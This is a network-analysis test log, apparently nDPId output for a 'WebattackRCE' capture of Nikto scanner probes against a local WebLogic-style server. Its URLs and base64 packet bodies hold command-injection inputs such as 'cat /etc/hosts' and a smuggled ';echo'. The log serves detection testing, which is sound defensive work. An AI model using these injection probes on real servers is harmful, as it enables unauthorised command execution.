{"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007183)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278004,"pkt":"AAAAAAAAAAAAAAAACABFAAE99rJAAEAGRQZ\/AAABfwAAAcf4H5DOUc\/uMPSpHIAYAED\/MQAAAQEICp1nABudZwAbR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007184)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":1576420278005,"pkt":"AAAAAAAAAAAAAAAACABFAAFH9c9AAEAGRd9\/AAABfwAAAcf6H5CvysyRaoy75oAYAED\/OwAAAQEICp1nAB2dZwAdR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25SZXF1ZXN0ZXJQb3J0VHlwZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} 
-01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationRequesterPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007185)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278006,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/YadAAEAG2g9\/AAABfwAAAcf8H5A46lj5CJ27noAYAED\/MwAAAQEICp1nAB6dZwAeR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlMTEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007186)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":1576420278008,"pkt":"AAAAAAAAAAAAAAAACABFAAFD5CdAAEAGV4t\/AAABfwAAAcf+H5BRed18Cunwm4AYAED\/NwAAAQEICp1nACCdZwAfR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQzExIEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTg3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} 
-01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007187)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278010,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/OK1AAEAGAwp\/AAABfwAAAcgAH5D7EgH2VMq6xIAYAED\/MwAAAQEICp1nACKdZwAiR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlMTEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODgpDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007188)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1576420278012,"pkt":"AAAAAAAAAAAAAAAACABFAAFJWQ5AAEAG4p5\/AAABfwAAAcgCH5Cjm2BUk9d3uYAYAED\/PQAAAQEICp1nACSdZwAkR0VUIC9sb2dpbi5jZ2k\/Y2xpPWFhJTIwYWElMjdjYXQlMjAvZXRjL2hvc3RzIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MjM0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} 
-01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi?cli=aa%20aa%27cat%20\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007234)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1576420278014,"pkt":"AAAAAAAAAAAAAAAACABFAAE1Ck9AAEAGMXJ\/AAABfwAAAcgEH5AitzMTI6HHCIAYAED\/KQAAAQEICp1nACadZwAmR0VUIC9zaGVsbD9jYXQrL2V0Yy9ob3N0cyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzIzNSkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat+\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007235)"}} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
